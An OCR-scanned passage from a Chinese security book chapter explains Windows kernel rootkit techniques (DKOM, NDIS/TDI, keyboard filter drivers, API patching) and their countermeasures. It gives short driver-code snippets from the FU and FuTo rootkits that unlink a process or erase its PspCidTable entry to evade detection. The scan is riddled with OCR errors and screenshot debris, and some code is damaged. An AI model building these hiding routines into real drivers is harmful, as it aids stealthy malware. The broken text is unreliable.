同 ，DKOM 将 修改 代表 进程 、 驱 动 程序 和 特权 的 数据 结构 。 


DKOM 最 常见 的 实例 是 FU Rootkit。 它 能 隐藏 进程 、 驱 动 程序 和 提升 特权 。 这 个 Rootkit 修 改 核心 内 存 中 记录 活动 进程 的 数 
据 结构 来 隐藏 进程 。 这 个 数据 结构 由 多 个 主要 的 系统 API (如 ZwQuerysystemlnformation () ) 向 程序 (如 任务 管理 器 ) 报 
告 。 修 改 这 些 API 的 数据 结构 ， 你 就 可 以 在 不 安装 执行 流 钩子 的 情况 下 过 滤 信 息 。 


研究 和 识别 需要 修改 的 对 象 之 后 ，DKOM 下 一 个 最 困难 的 部 分 是 在 内 存 中 寻找 想 要 修改 的 对 象 。 为 了 隐藏 一 个 进程 ， 需 要 
修改 的 是 EPROCESS 结 构 。 查 找 这 个 结构 的 最 常见 途径 是 调用 PsGetCurrentProcess () 得 到 指向 当前 执行 进程 的 EPROCESS 结 
构 的 指针 ， 然 后 遍历 存储 在 LIST_ENTRY 字 段 中 的 一 个 链表 结构 。LIST_ENTRY 字 段 包含 两 个 指针 ， 一 个 指向 前 一 个 进程 (FLINK 
FRR) ， 一 个 指向 后 一 个 进程 (BLINK 字 段 ) 。 你 很 容易 向 前 (或 者 向 后 ) 查找 ， 扫 描 所 希望 隐藏 的 进程 名 。 


现在 ， 当 前 的 EPROCESS 结 构 是 希望 隐藏 的 进程 (我 们 假设 你 已 经 循环 查找 到 它 并 已 停止 查找 ) ， 可 以 修改 周围 的 进程 的 
EPROCESS 结 构 来 隐藏 它 。 具 体 地 说 ， 你 必须 将 后 一 个 进程 的 FLINK 修 改 为 当前 进程 的 FLINK， 将 前 一 个 进程 的 BLINK 修 改 为 当 
前 进程 的 BLINK。 现 在 的 当前 进程 (你 希望 隐藏 的 ) 实际 上 从 活动 进程 链 中 断 开 了 ， 而 进程 链 通过 调整 周围 的 两 个 进程 的 指针 而 
保持 有 效 。FU Rootkit 用 下 面 的 两 行 驱动 程序 源 代码 来 完成 这 一 交换 : 


plist_active_procs = (LIST ENTRY *) (eproc+FLINKOFFSET) ; 
*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink; 
*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink; 


简单 地 修改 这 个 内 核对 象 ， 你 能 够 取得 和 挂钩 每 个 依赖 这 个 对 象 的 API 函 数 相同 的 效果 。DKOM 明 显 是 Rootkit 作 者 的 强大 
工具 ， 因 为 修改 是 隐蔽 的 ， 同 时 ， 这 一 修改 影响 多 个 操作 系统 的 运作 。 


© DKOM 对 策 


计算 机 防御 者 很 幸运 ，DKOM 不 是 非常 可 靠 ， 因 为 它 需 要 预见 和 和 了解 许多 操作 系统 内 部 细节 ， 才 能 正确 地 实现 和 移植 、 在 
多 种 平台 /体系 结构 下 保持 扩展 性 和 兼容 性 。Rootkit 作 者 必须 理解 内 核 使 用 对 象 (从 初始 化 到 清除 ) 的 所 有 细节 ， 以 及 修改 对 象 
造成 的 副作用 。 这 意味 着 Rootkit 作 者 必须 花费 相当 多 的 时 间 来 对 对 象 进行 逆向 工程 ， 而 这 个 对 象 可 能 完全 没有 文档 记载 。 而 
且 ， 对 象 在 操作 系统 未 来 的 发 行 版 本 和 补丁 中 非常 容易 变化 ， 所 以 DKOM 无 法 保证 能 够 经 受 住 时 间 的 考验 。 


DKOM 很 容易 被 发 现 ， 因 为 它 不 能 可 靠 地 修改 内 存 中 表现 相同 信息 的 每 个 内 核对 象 。 例 如 ，Executive 的 多 个 组 件 都 保留 一 
个 执行 进程 的 列表 ， 所 以 除非 Rootkit 修 改 内 存 中 的 每 个 对 象 ， 否 则 使 用 交叉 查看 (cross-view) 的 Rootkit 检 测 工具 在 列表 比较 
中 查找 差异 ， 就 能 发 现 Rootkit。 


NZ 
@” 


网 络 驱 动 程序 接口 规范 (NDIS) 和 传输 驱动 程序 接口 (TDI) Rootkit 





Windows 中 网 络 体系 结构 的 最 低级 别 是 物理 网 络 设备 ， 如 modem 和 网 卡 。 对 低级 协议 和 硬件 组 件 本 身 的 访问 由 网 络 驱动 
程序 接口 规范 (NDIS) API 提 供给 操作 系统 中 的 驱动 程序 。NDIS 工 作 于 数据 链 路 层 的 上 部 ， 网 络 层 之 下 ， 对 低级 协议 (如 以 太 
网 、 光 纤 分 布 数据 接口 (FDDI) 和 异步 传输 模式 (ATM) ) 进行 抽象 。 在 NDIS 之 上 是 另 一 个 重要 的 接口 传输 驱动 程序 接 
O (TDI) ， 进 一 步 抽 象 NDIS 细 节 ， 提 供给 更 高 级 别 或 者 中 间 级 别 的 网 络 驱 动 程序 。 本 质 上 ，NDIS 使 驱动 程序 能 够 处 理 原始 封 
包 (和 来 自 物理 硬盘 的 原始 字 节 值 很 类 似 ) ， 而 TDI 实 现 Windows 中 的 TCP/IP 协 议 栈 ， 并 且 使 驱动 程序 能 够 在 OSI 模型 的 传输 层 
之 上 操作 。 


Rootkit 可 以 选择 任何 一 个 接口 ， 但 是 明显 越 低级 的 接口 越 好 。 因 此 ， 真 正高 级 的 Rootkit 将 使 用 NDIS 在 OSI 模型 中 的 第 2 层 
以 及 更 低层 次 (也 就 是 原始 封包 ) 上 操作 ， 而 更 容易 发 现 的 Rootkit 将 挂钩 现 有 的 使 用 TDI 的 TCP/IP 协 议 栈 。 即 使 在 TDI 级 别 ， 也 
需要 很 多 的 信息 收集 工作 才能 实现 套 接 字 连 接 性 和 其 他 大 部 分 编程 人 员 使 用 的 高 级 语言 概念 (例如 寻 址 ) 。 幸 运 的 是 ，Rootkit 
作者 可 以 从 互联 网 上 搜索 和 下 载 到 整个 TDI 套 接 字 程序 库 的 源 代码 。 大 部 分 信息 搜集 工作 涉及 人 工 定义 结构 ， 如 本 地 和 远程 地 
址 、TCP 端 口 等 ， 然 后 利用 由 Windows 内 建 的 TDI 兼 容 驱 动 程序 实现 的 创建 例 程 。 


NDIS Rootkit 的 强大 在 于 它们 不 依赖 Windows 内 建 的 网 络 功 能 (除了 在 网 络 接口 卡 (NIC) 级 别 上 以 外 ) ， 所 以 任何 个 人 
防火 墙 或 者 网 络 监控 工具 都 没有 可 能 发 现 它 及 其 产生 的 网 络 流量 。uAy Rootkit 就 是 一 个 这 样 的 例子 ， 其 他 流行 的 NDIS Rootkit 
包括 eEye 的 bootroot 和 Hoglund 的 NT Rootkit。 


© NDIS 对 策 


NDIS Rootkit 是 个 可 怕 的 对 手 ， 只 有 运行 在 原始 封包 级 别 的 防火 墙 能 够 捕捉 这 些 怪兽 。TDI Rootkit 可 由 运行 在 TDI 层 的 大 
部 分 个 人 防火 墙 捕获 ， 除 非 Rootkit 实 施 某 种 和 干扰。 免费 工具 如 Sysinternals TdiMon 可 以 用 于 人 工 发 现 可 疑 的 TDI 活 动 。 这 种 方 


法 比较 不 可 靠 ， 并 且 依赖 具有 渊博 知识 的 分 析 人 员 。 


而 且 ， 这 些 类 型 的 Rootkit 会 创建 可 被 边界 设备 和 入 侵 检 测 系统 发 现 的 网 络 流量 。 因 此 ， 包 括 网 络 安全 度量 的 全 面 安全 策略 
(例如 ， 安 装 在 关键 边界 位 置 的 网 络 入 侵 检测 系统 (NIDS) ) 以 及 主机 保护 系统 是 对 付 NDIS Rootkit 的 最 佳 方法 。 


45 ”内核 模 式 Rootkit 实 例 


现在 ,我们 将 介绍 一 些 应 用 刚才 讨论 过 的 技术 的 实例 。 内 核 模 式 恶 意 软 件 实例 的 杰出 资源 之 一 可 从 http://www.f- 
secure.com/weblog/archives/kasslin AVAR2006 KernelMalware_paper.pdf. 获 得 。 


在 我 们 研究 这 些 实例 的 时 候 要 记 住 ， 这 些 Rootkit 的 版 本 可 能 与 实际 中 看 到 的 变种 不 同 。 为 了 增加 /删除 特性 和 将 验证 性 的 
Rootkit 改 造成 稳定 的 产品 ，Rootkit 代 码 常常 被 出 售 、 重 新 分 发 、 改 进 和 重 编译 。 因 此 ， 我 们 的 实验 中 的 许多 技术 、 缺 陷 和 /或 
特性 可 能 与 各 位 读者 所 经 历 的 有 所 不 同 。 


4.5.1 Clandestiny 创 建 的 Klog 
技术 : 过 滤器 /分 层 驱动 程序 


Klog 安 装 键盘 过 滤器 驱动 程序 在 按键 时 拦截 键盘 IRP。 每 当 按 下 一 个 键 ， 从 键盘 发 送 一 个 扫描 码 给 操作 系统 端口 驱动 程序 
i8042prt.sys， 然 后 发 送 给 类 驱动 程序 kbdclass.sys。Rootkit 可 在 ij8042prt.sys 之 上 安装 一 个 端口 过 滤器 驱动 程序 ， 或 者 在 
kbdclass.Sys 之 上 安装 一 个 更 高 级 别 的 过 滤器 驱动 程序 。Klog 选 择 后 者 。 


现在 我 们 必须 详细 说 明 这 个 设备 栈 中 的 一 个 典型 IRP 的 生命 周期 。 你 可 能 会 问 ， 操 作 系统 如 何 知道 何 时 按 下 一 个 键 ?” 从 MO 
管理 器 开始 的 进程 发 送 一 个 空 的 IRP 给 最 低级 别 的 驱动 程序 ， 这 个 IRP 进 入 队列 直到 按 下 一 个 键 。 按 键 发 生 时 ， 驱 动 程序 用 所 有 
必要 的 参数 填写 IRP， 通 知 键盘 设备 栈 中 的 驱动 程序 这 个 操作 ， 这 些 参数 包括 IRP 主 功能 码 和 扫描 代码 数据 。 


回忆 一 下 4.3.1 节 中 的 讨论 ，IRP 的 目的 在 数据 结构 的 主 功能 字段 中 定义 。 这 些 功 能 包括 创建 、 清 除 、 读 和 写 。 因 此 ， 其 他 
IRP 在 整个 进程 期 间 都 要 发 送 。 但 是 ， 因 为 你 打算 记录 击 键 ， 你 所 感 兴趣 的 是 “ 读 ”1IRP， 因 为 这 些 IRP 对 应 读 取 到 的 扫描 码 (你 
可 以 由 此 得 到 按 下 的 键 ) 。 所 有 其 他 的 IRP 必 须 传递 到 设备 栈 的 下 一 个 驱动 程序 。 


当空 的 IRP 沿 着 设备 栈 传递 时 ， 你 通过 定义 在 IRP 传 回 给 设备 栈 ( 按 下 一 个 键 之 后 ) 时 一 个 特殊 的 例 程 所 要 处 理 的 IRP 类 型 ， 
来 “标记 ”′ 感 兴趣 的 IRP。 这 个 函数 被 称 作 完成 例 程 (completion routine) 。 因 为 你 只 关注 “ 读 ，IRP， 所 以 在 填写 IRP 并 且 发 
送 回 设备 栈 时 将 提供 希望 调用 的 函数 地 址 。 


我 们 已 经 介绍 了 Klog 如 何在 操作 系统 中 放置 自身 以 拦截 击 键 ， 现 在 让 我 们 来 看 看 它 的 实际 运作 。 首 先 要 注意 的 一 点 
是 ，Klog 是 个 概念 验证 性 Rootkit， 并 不 试图 装载 或 者 隐藏 自 己 。 因 此 ， 许 多 实际 中 的 其 他 Rootkit 仅 仅 把 Klog 源 代码 作为 更 高 
级 Rootkit 的 基础 。 


为 了 装 入 Klog Rootkit 驱 动 程序 klog.sys， 我 们 将 使 用 一 个 小 的 图 形 化 工具 InstDrv。 这 个 免费 工具 启动 或 者 停止 一 个 服务 控 
制 管 理 器 (SCM) 创建 的 临时 服务 装 入 / 纯 载 驱动 程序 。 图 4-3 演 示 了 使 用 这 个 工具 为 Klog 驱 动 程序 创建 一 个 服务 ， 并 且 使 用 
SCM 将 服务 装 入 内 核 模式 。 


InstDry 


Full pathname of driver 


‘c:\klog\klog. sys 


Install Stop Remove 


Status: Operation was successful 





图 4-3 ”使 用 InstDrv 装 入 Klog Rootkit 驱 动 程序 


Klog 将 一 个 包含 捕捉 到 的 击 键 的 日 志文 件 写 入 C: \Klog.txt。 图 4-4 显 示 ， 这 个 日 志文 件 在 记事 本 应 用 程序 中 输入 几 个 单词 
之 后 增 大 到 1kB。 


如 果 你 希望 看 到 日 志文 件 的 内 容 ， 必 须 首先 用 InstDrv 停 止 Klog 服 务 。 否 则 ，Windows 将 警告 你 该 文件 当前 被 其 他 进程 使 
用 。 这 个 进程 实际 上 是 Klog 初 始 化 ， 用 于 处 理 实际 记录 的 内 核 模式 系统 工作 线程 。 停 止 服务 并 印 载 klog.sys 驱 动 程 序 ， 就 会 调用 
驱动 程序 的 Unload () 例 程 ， 在 源 代码 中 你 可 以 看 到 ， 这 个 例 程 停止 工作 线程 。 
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图 4-4 Klog 日 志文 件 随 着 捕捉 击 键 而 增长 


当 你 试图 使 用 InstDrv 卸 载 驱动 程序 时 会 出 现 一 个 有 趣 的 问题 。 单 击 InstDrv 的 Stop 按 钮 时 ， 该 工具 要 求 SCM 停 止 Klog 服 务 
并 且 印 载 驱动 程序 。 但 是 这 里 有 个 问题 ， 与 本 小 节 前 面 对 “IRP 的 生命 期 ”的 讨论 相关 。 


回忆 一 下 ， 创 建 一 个 空 的 IRP 等 待 键盘 按 下 ， 而 这 个 IRP 作 了 标记 ， 这 样 MO 管 理 器 在 用 扫描 码 填写 IRP 时 将 发 送 这 个 IRP。 这 
意味 着 IRP 在 用 户 按 下 一 个 键 之 前 保持 待 决 (pending) 状态 。 内 核 驱动 程序 的 一 个 关键 原则 是 如 果 驱 动 程序 注册 处 理 的 IRP 仍 
然 处 于 待 决 状态 ， 这 个 驱动 程序 就 不 能 外 载 。 如 果 这 个 驱动 程序 和 卸载 ， 系 统 将 出 现 蓝 屏 错误 。 这 是 OS 实施 的 安全 机 制 ， 因 为 待 
决 IRP 中 包含 的 读 操作 完成 例 程 的 指针 现在 变 为 无 效 。 按 下 一 个 键 并 且 IRP 沿 设备 栈 上 传 时 ， 将 会 遇 到 这 个 无 效 的 函数 地 址 ， 导 
致 访问 违例 。 这 样 ， 设 备 栈 就 会 被 破坏 。 


那么 ， 在 InstDrv 中 单 击 Stop 按 钮 会 发 生 什 么 事情 呢 ? 和 幸运 的 是 ，SCM 将 会 意识 到 这 种 情况 并 且 将 服务 标记 为 待 决 卸 载 
(pending unload) ， 同 时 等 待 IRP 完 成 。 你 将 会 注意 到 系统 变 得 迟缓 ; 但 是 ， 一 有 按键 ， 系 统 就 返回 到 正常 状态 ， 驱 动 程序 
被 卸载 。 这 是 因为 IRP 从 待 决 变 为 激活 ， 我 们 的 函数 处 理 了 产生 的 IRP，SCM 终 止 Klog 服 务 并 且 卸 载 该 驱动 程序 。 


这 种 特殊 性 是 考虑 内 核 模式 Rootkit 副 作用 时 应 该 记 住 的 : 频繁 和 不 能 解释 的 蓝屏 可 能 表示 Rootkit 有 缺陷 。 


DeviceTree ¥2.19 - Driver View - OSR's Device and Driver Explorer 
File View Search Ids Help 


全 | 中 [Jo P| 
DRY (unnamed) 
DRY \Driver\ACPI 3 f 
DRY \DrivertACPI_HAL Device Name: (unnamed) Type: |FILE_DEVICE_KEYBOARD 


DRY VDriveraFD Driver Name: \Driver\klog Security Attributes 


DRY \Driver\atapi Device Object Ox81F6DC28 FSDevice: 000000000 Dpc Importance: 0x0 


DRY \Driver\audstub Driver Object: fö; | Device Type: 1 Dpc Routine: x00000000 
DRY \Driver\Beep 


DRY \Driver\Cdrom Next Device: 000000000 Stack Size: 7 on Number: 0x0 
DRY \Driver\CmBatt Handle Count: 0 Alignment: 0x0 aracteristics: 0x0 
DRY \Driver}Compbatt Pointer Count 3 ve 0x00000000 Flags: 0200¢ 
DRY \Driver\Disk Creation Time: 12/3176919:00:00 ‘Preferences: 0 Curent rp 000000000 
DR cabal an Attached Device: [000000000 
DRY \Driver\dmload : 
DRY \Driver\Fde Interpreted Device Characteristics: Interpreted Device Flags: 
DRY \Driver\Fips Re 
DRY \Driver\Fipydisk POWER PAGABLE 
DRY \Driver\Ftdisk 一 
DRY \Driver\Gpc Enumeration Information 
DRY \Driver\HTTP Device Id 
DRY \Driver\is042prt instance k 
DRY \Driver\Intellde 
DRY \Driver\IpNat _ > r 
DRY \Driver\IPSec Hardware Ids: Compatible Ids: 
DRY \Driver\isapnp 
DRY \Driver\Kbdclass 
DEY \Device\KeyboardClass1 Device Capabilies: | 
= DEV \Device\KeyboardClasso I DeviceD1 De - RawDewiceok a 加 | 
WATT) Attached: (unnamed) - \Driver\klog  DeviceD2 厂 UniquelD I~ SurpriseRemovalOkK Í WakeFromD1 |_ NonDynamic 
DRY \Driver\klog | LockSupported [ Removable [M SilentInstall = titan a Wa oc oo 
DRY \Driver\KSecDD | EjectSupported address akerrom oDisplayln! 
DRY ‘\Driver\mnmdd 
DRY Driver\Mouclass SystemWake: UlNumber: DeviceState 
DRY \Driver\MountMgr Di Latency: DeviceW ake: 
DRY \Driver\mssmbios D2Latency: D3Latency: 
DRY \Driver\NDIS 
DRY \Driver\NdisTapi Resources 
DRY \Driver\Ndisuio 


For Help, press F1 











Vendor: 





WakeFromDO 厂 HardwareDisabled 




















CRON CECR oe & & & 





图 4-5 DeviceTree 显 示 连 接 到 键盘 类 了 驱动 程序 的 Rootkit 


使 用 OSR 的 DeviceTree 工 具 ， 你 可 以 看 到 Rootkit 设 备 挂钩 到 操作 系统 的 键盘 类 驱动 程序 kbdclass.sys 设 备 栈 中 。 在 图 4-5 
中 ， 连 接 到 KeyboardClass0 键 盘 设备 栈 的 Klog 设 备 以 绿色 突出 显示 。KeyboardClass0 是 kbdclass.sys 显 示 的 设备 名 称 ， 所 有 更 
高 级 别 的 键盘 驱动 程序 都 将 设备 对 象 连接 到 这 个 设备 (Klog 的 设备 对 象 名 为 \Drivemklog) 。 


同样 ， 这 个 Rootkit 并 不 企图 隐藏 自身 。 隐 蔽 性 的 Rootkit 以 不 同 的 方式 连接 (例如 ， 挂 钩 键盘 驱动 程序 的 IRP 处 理 函 数 ) 或 
者 隐藏 使 你 发 现 其 运作 的 痕迹 。 这 些 痕迹 包括 注册 表 项 目 、 内 存 中 的 驱动 程序 专用 结构 (例如 ，DRIVER_OBJECT 和 
DEVICE OBJECT) 以 及 和 ee 


4.5.2 ” Aphex 创建 的 AFX 


技术 : patch/detour 


AFX Rootkit 是 2005 年 用 Delphi 语 言 编写 的 内 核 模 式 Rootkit， 能 够 修补 Windows API 函 数 来 隐藏 以 下 项 目 : 进程 、 句 柄 、 
模块 、 文 件 /文件 夹 、 注 册 表 项 目 、 活 动 网 络 连接 和 系统 服务 。 


AFX 带 有 一 个 装 入 程序 root.exe， 它 将 内 部 资源 解压 到 一 个 名 为 hook.dll 的 文件 。 这 个 文件 是 AFX 用 于 隐藏 所 有 安装 文件 夹 
实例 并 装 入 Rootkit 驱 动 程序 的 一 个 助手 程序 库 。root.exe 工 具 还 将 驱动 程序 解压 为 临时 文件 中 的 一 个 .tmp 文 件 ， 并 且 使 用 对 服 
务 控制 管理 器 的 Win32API 调 用 装 入 它 。root.exe 有 两 个 命令 行 参 数 : /i 表示 使 用 SCM 安 装 Rootkit，/u 表 示 御 载 Rootkit。 


AFX 能 够 通过 API 调 用 CreateRemoteThread () 和 WriteProcessMemory () ， 使 用 代码 注入 隐藏 这 些 项 目 ， 然 后 在 注入 
的 进程 地 址 空间 中 修补 DLL。 通 过 在 进程 内 的 Win32DLL 副 本 (kernel32.dll、user32.dll、advapi32.dll 等 ) 搜索 特定 的 函数 并 
Bmx ， 可 进行 这 些 修补 。AFX 使 用 VirtualProtect () API 将 旧 的 函数 存储 在 它 的 进程 的 私有 地 址 空间 中 ， 这 样 稍 候 


这 些 函 数 就 可 以 脱钩。 


AFX 针 对 的 是 用 户 模式 中 显示 文件 的 系统 进程 (explorer.exe) 。 通 过 将 修补 代码 注入 explorer.exe， 对 所 有 基于 Explorer 
或 者 Internet Explorer 的 应 用 程序 (包括 命令 行 ) 隐藏 这 些 文件 。 图 4-6 显 示 了 AFX 安 装 命令 及 其 结果 : 驱动 器 C: \ (ARIK 
器 ) 在 Explorer 中 不 可 见 。 


AFX 的 驱动 程序 接着 进一步 修补 多 个 Windows API 函 数 。 显 示 所 有 修补 的 最 简单 方法 是 运行 Joanna Rutkowska 的 System 
Virginity Verifier (SVV) ， 这 个 程序 比较 各 种 系统 二 进 制 代码 (例如 ，AFX 修 补 的 原生 API DLL) 的 磁盘 和 内 存 函 数 输出 。 下 
面 是 SVV 输 出 的 一 个 简短 版 本 : 


ntdll.dll1 (7c900000 - 7c9b0000)... suspected! (verdict = 5). 
module ntdll .dll [0x7c900000 - 0x7c9b0000] : 
0x7c90d8e3 [NtDeviceIoControlFile()+0] 5 byte(s): JMPing code (jmp to: 0x10436537) 
address 0x10436537 DOES NOT belong to ANY MODULE! 
file :b8 42 00 00 00 
memory :e9 54 8c b2 93 


verdict 5 


0x7c90d94c [NtEnumerateKey()+0] 5 byte(s): JMPing code (jmp to: 0x10436507) 

0x7c90d976 [NtEnumerateValueKey()+0] 5 byte(s): JMPing code (jmp to: 0x10436413) 

0x7c90df5e [NtQueryDirectoryFile()+0] 5 byte(s): JMPing code (jmp to: 0x104367c7) 

0x7c90elaa [NtQuerySystemInformation()+0] 5 byte(s): JMPing code (jmp to: 0x1043624f) 

0x7c9538eb [RtlQueryProcessDebugInformation()+0] 5 byte(s): JMPing code (jmp to: 0x10436ea7) 
kernel32.dll (7c800000 - 7c8£4000)... suspected! (verdict = 5). 


0x7c802332 [CreateProcessW()+0] 5 byte(s): JMPing code (jmp to: 0x104371e3) 
0x7c802367 [CreateProcessA()+0] 5 byte(s): JMPing code (jmp to: 0x1043714b) 


PSAPI.DLL (76b£0000 - 76bfb000)... suspected! (verdict = 5). 
Ox76bf1flc [EnumProcessModules () +0] 5 byte(s): JMPing code (jmp to: 0x10436fcf) 
ADVAPI32.d1l (77dd0000 - 77e6b000)... suspected! (verdict = 5). 


Ox77deaf3f [EnumServicesStatusA()+0] 5 byte(s): JMPing code (jmp to: 0x10436a3b) 
0x77d£7775 [CreateProcessAsUserW()+0] 5 byte(s): JMPing code (jmp to: 0x10437317) 
0x77e10958 [CreateProcessAsUserA()+0] 5 byte(s): JMPing code (jmp to: 0x1043727b) 
0x77e15c9d [CreateProcessWithLogonwW()+0] 5 byte(s): JMPing code (jmp to: 0x104373b3) 
0x77e3681b [EnumServicesStatusExwW()+0] 5 byte(s): JMPing code (jmp to: 0x10436d9f) 
Ox77e36a8f [EnumServicesStatusExA()+0] 5 byte(s): JMPing code (jmp to: 0x10436c77) 
0x77e37b91 [EnumServicesStatusW()+0] 5 byte(s): JMPing code (jmp to: 0x10436b6b) 
SYSTEM INFECTION LEVEL: 5 


0 - BLUE 

1 - GREEN 
2 - YELLOW 
3 - ORANGE 
4 - RED 


--> 5 - DEEPRED 
SUSPECTED modifications detected. System is probably infected! 












| Favorites | 
Q) sak = + i Search Folders fi- 


pC'\ 
System Tasks 2) 
(m) Hide the contents of this 
drive 
iD Add or remove programs 
» Search For files or Folders 
File and Folder Tasks R 


5 Make a new folder 
Ue] Publish this folder to the 


Web 


cx C:\WINDOWS\system32\cmd.exe 


>=\Documents and Settings\tester>cd \ 
2=\>ed afx 

=\AFROdir 

Volume in drive C has no label. 
Volume Serial Number is 3@AC-29F2 
Directory of C:\AFX 


83/64/2609 2 <DIR> 
: <DIR> 


270.293 AFXRootkit20@5 .zip 
2,862 ReadMe .txt 
f 23,644 root.exe 
037/0472009 2: <DIR> src 
296.799 bytes 
3 DirCs> 69.772.928 .416 bytes free 


>= NAFX >root 
>= \AFK root 





>= \AFX> 





图 4-6 AFX 立 刻 隐藏 安装 目录 


AFX 修 补 下 列 系 统 二 进 制 代码 : ntdll.dll，kernel32.dll，PSAPI.DLL 和 ADVAPI32.dll。 注 意 ， 在 所 有 例子 中 都 类 似 ，AFX 用 
(5 个 字 节 的 JMP+ 地 址 ) 覆盖 这 些 函 数 ， 指 向 0x10436000-0x10437000 范 围 中 的 一 个 地 址 ， 这 个 地 址 范围 指向 Rootkit 的 钩子 
代码 。 


还 要 注意 ，SVV 指 出 覆盖 的 字 节 中 指向 的 地 址 不 属于 任何 模块 。 这 是 因为 AFX 隐 藏 了 进程 ! 你 可 以 使 用 交叉 查看 技术 找到 隐 
藏 的 进程 ， 从 图 4- 7 中 的 Helios 屏 幕 截图 就 能 看 出 (我 们 将 在 第 10 章 中 介绍 Rootkit 检 测 技术 ) 。 


 HELIOS - Advanced Malware Detection System v1.1a 


On Demand Scan System Status Process Information Kernel Modules System Call Table Inoculation Status Log 





PID Name Imaqe Path ZOSI Eprocess List Eproc Enum Terminate Unhide 
spoolsv.exe \Device\HarddiskVolume1\WINDOWS\sy... ~ S r 
INSTDRY.EXE \Device\Harddisk¥olume1\Documents an... 


Toggle Backgound Scan 


procexp.exe \Device\HarddiskVolume1l\Documents an... 
svchost.exe \Device\HarddiskVolume1\WINDOWSi\sy... 
svchost.exe \Device\Harddisk¥olume1\WINDOWSisy... 
svchost.exe \Device\Harddisk¥olume1\WINDOWS\sy... 








Clear Status Log cmd.exe \Device\Harddisk¥olume1\WINDOWS\sy... 
svchost.exe \Device\HarddiskVolume1\WINDOWS\sy... 
alg.exe \Device\HarddiskVolume1\WINDOWS\sy... 
svchost.exe \Device\Harddisk¥olume1\WINDOWS\sy... 
VBoxServic... \Device\HarddiskVolume1\WINDOWS\sy... 
Isass.exe \Device\HarddiskVolume1\WINDOWS\sy... 
services.exe \Device\HarddiskVolume1\WINDOWSisy... 
winlogon.exe \Device\Harddisk¥olume1\WINDOWSisy... 
csrss.exe \Device\HarddiskVolume1\WINDOWS\sy... 








人 
AAA BSS mm Ss 
SEB mA aS 


root,exe \Device\HarddiskYolume1\AFX\root,exe 
2 t é WwWscntfy,exe \Device\HarddiskVolume1\WINDOWS\sy... 
J DeviceTree... \Device\Harddisk¥olume1\Documents an... 
smss,exe \Device\Harddisk¥Volume1\WINDOWS\sy... 


Sustem 





[Eprocess: 50, ZWQSI: 22, EprocEnum: 49, HIDDEN: 1] 


图 4-7 Helios 发 现 AFX 隐 藏 进程 


补充 说 明 一 点 ，AFX Rootkit 是 很 耗费 资源 的 ， 因 为 它 使 用 Dephi 编 译 ， 没 有 为 Windows 系 统 进行 优化 。 安 装 AFX 后 系统 明 
显 变 得 迟缓 。 


4.5.3 Jamie Butler, Peter Silberman 和 (人 C.H.A.O.S 创 建 的 FU 和 FUTo 


技术 : DKOM 


FU Rootkit 必 Unix/Linux 命 令 Su 命 名 ，Su 命 令 使 用 户 在 账户 许可 的 情况 下 将 权限 提升 为 根 用户 级 别 。FU Rootkit 以 完全 不 
同 的 方式 使 用 户 模式 进程 将 其 特权 提升 到 管理 员 级 别 ， 并 且 隐 藏 文件 、 驱 动 程序 和 进程 。 


我 们 已 经 详细 地 介绍 了 FU 的 技术 ， 现 在 再 来 看 看 Peter Silberman 和 C.H.A.O.5 编 写 的 FuTo rootkit 增 加 的 功能 。 这 
Rootkit 基 于 FU 的 代码 库 ， 但 是 FuTo 不 修改 进程 列表 结构 ， 而 是 修改 PspCidTable 表 结构 来 隐藏 进程 。 这 个 未 输出 的 结构 维持 一 
个 所 有 活动 进程 和 线程 的 列表 ， 用 于 Win32API 函 数 OpenProcess () . OpenProcess () 函数 被 许多 应 用 程序 用 来 发 送 句柄 给 
活动 进程 ， 这 些 应 用 包括 流行 的 Rootkit 检 测 工 具 Blacklight。 因 此 ，FuTo 的 作者 发 现 了 一 个 思 弄 Blacklight 的 简单 方法 : 只 要 
从 PspCidTable 中 删除 进程 就 可 以 对 Blacklight 隐 藏 。 下 面 是 完成 这 一 工作 的 源 代码 : 

typedef PHANDLE TABLE ENTRY (*ExMapHandleToPointerFUNC) ( IN PHANDLE TABLE 


HandleTable, IN HANDLE ProcessIqd) ; 
void HideFromBlacklight (DWORD eproc) 


PHANDLE TABLE ENTRY CidEntry; 
ExMapHandleToPointerFUNC map; 
ExUnlockHandleTableEntryFUNC umap; 

PEPROCESS p; 

CLIENT ID ClientId; 

map = (ExMapHandleToPointerFUNC) 0x80493285; 
CidEntry = map((PHANDLE TABLE) 0x8188d7c8, 
LongToHandle (* ((DWORD*) (eproc+PIDOFFSET)) ) ); 


if (CidEntry != NULL) 
{ 
CidEntry->Object = 0; 
} 
return; 


作者 采用 了 一 个 危险 的 hack 来 解决 修改 PspCidTable 所 引起 的 严重 问题 。 当 对 PspCidTable 进 行 修改 时 ，FuTo 设 置 进程 入 
口 为 空 。 这 意味 着 当 进 程 关 闭 时 ， 系 统 因为 内 核 模式 中 废弃 一 个 空 指针 而 出 现 蓝屏 。 为 了 解决 这 个 问题 ，FuTo rootkit 安 装 了 一 
个 通知 例 程 ， 每 当 进 程 关 闭 时 ，Rootkit 首 先 得 到 通知 。 这 使 得 Rootkit 能 够 重新 在 活动 进程 表 (PspCidTable) 中 临时 插入 隐藏 
的 进程 ， 这 样 系统 就 不 会 朋 溃 ， 然 后 进程 可 以 正常 退出 。FU 没 有 这 个 问题 ， 因 为 目标 结构 是 一 个 链表 ， 使 它 可 以 “重新 链 
接 ” 周 围 的 进程 进行 隐藏 。 


4.5.4 Sherri Sparks 和 Jamie Butler 创 建 的 Shadow Walker 


技术 : IDTHIF 


注意 : 这 个 Rootkit 很 大 程度 上 是 基于 现 有 的 Linux 堆 栈 溢出 保护 产品 PaX (http://pax.grssecurity.net/) 和 Joanna Rutkowska 的 研 
究 成 果 。 


Shadow Walker 是 一 个 通过 创建 系统 内 存 的 “伪造 视图 ”来 隐藏 其 存在 的 Rootkit。 这 种 技术 的 前 提 是 ， 如 果 Rootkit 能 
哄骗 检测 工具 以 为 读 取 的 是 正确 的 内 存 ， 就 不 需要 修改 程序 执行 流 (也 就 是 钩子 、 修 补 或 者 detour) 或 者 内 存 中 的 数据 结构 
(DKOM) 。 实 际 上 ， 系 统 上 的 所 有 其 他 程序 都 将 接收 到 一 个 不 精确 的 内 存 映射 ,只 有 Rootkit 知 道真 正 的 情况 。 作 者 将 这 种 技 
术 称 之 为 内 存 伪 装 (memory cloaking) 以 及 “第 四 代 Rootkit 技 术 ” (http://www.phrack.org/issues.html? 
